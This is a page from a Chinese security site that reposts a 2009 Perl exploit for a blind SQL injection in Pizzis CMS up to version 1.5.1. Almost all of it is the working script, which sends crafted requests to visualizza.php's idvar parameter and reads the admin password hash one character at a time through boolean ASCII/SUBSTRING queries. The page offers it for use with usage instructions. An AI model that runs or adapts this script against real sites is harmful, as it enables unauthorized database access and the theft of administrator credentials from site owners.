首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit
来源:http://darkjoker.net23.net 作者:darkjoker 发布时间:2009-01-09  
--+++=============================================================+++--
--+++====== Pizzis CMS <= 1.5.1 Blind SQL Injection Exploit ======+++--
--+++=============================================================+++--


#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket;

sub usage {
   die
       "\n[+] Pizzis CMS <= 1.5.1 Blind SQL Injection Exploit".
       "\n[+] Author: darkjoker".
       "\n[+] Site  : http://darkjoker.net23.net".
       "\n[+] Usage : perl $0 <hostname> <path> <username>".
       "\n[+] Ex.   : perl $0 localhost /pizziscms admin".
       "\n[+] Greetz: my girlfriend, she has no idea about what is it <3".
       "\n\n";
}

sub query {
   my ($user, $chr, $pos) = @_;
   my $query = "98765 OR ASCII(SUBSTRING((SELECT pass FROM pizziscms_admin WHERE user  = '${user}'),${pos},1))=${chr}";
   $query =~ s/ /%20/g;
   $query =~ s/'/%27/g;
   return $query;
}

sub exploit {
   my ($hostname, $path, $user, $chr, $pos) = @_;
   $chr = ord ($chr);

   my $sock = new IO::Socket::INET (
       PeerHost => $hostname,
       PeerPort => 80,
       Proto    => "tcp",
   ) or die $!;

   my $query = query ($user, $chr, $pos);
   my $request = "GET ${path}/visualizza.php?idvar=${query} HTTP/1.1\r\n".
             "Host: ${hostname}\r\n".
             "Connection: Close\r\n\r\n";

   print $sock $request;

   my $reply;
   while (<$sock>)
   {
       $reply .= $_;

   }
   close ($sock);

   $reply =~ s/\s/ /g;

   $reply =~ /<h4>(.+)\/h4>/;
      if (length ($1) > 1)
   {
       return 1;
   }
   else
   {
       return 0;
   }
}

if (scalar (@ARGV) != 3)
{
   usage ();
}

my ($hostname, $path, $user) = @ARGV;

my @key = split ('', 'abcdefghijklmnopqrstuvwxyz0123456789');
my $pos = 1;
my $chr = 0;

print "[+] Password: ";
while ($pos <= 32)
{
   if (exploit ($hostname, $path, $user, $key [$chr], $pos))
   {
       print $key [$chr];
       $chr = -1;
       $pos++;
   }
   $chr++;
}

print "\n";

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GOM Player 2.0.12.3375 (.ASX F
·XOOPS 2.3.2 (mydirname) Remote
·CuteNews <= 1.4.6 (ip ban) XSS
·Anope IRC Services With bs_fan
·IntelliTamper (2.07/2.08) Lang
·Virgilio Toolbar Toolbar Activ
·VMware COM DB ActiveX Remote B
·WinAmp GEN_MSN Plugin Heap Buf
·IE Denial of Service Exploit (
·VUPlayer <= 2.49 .PLS Universa
·以色列人发现的IE 0day
·Audacity 1.6.2 (.aup File) Rem
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved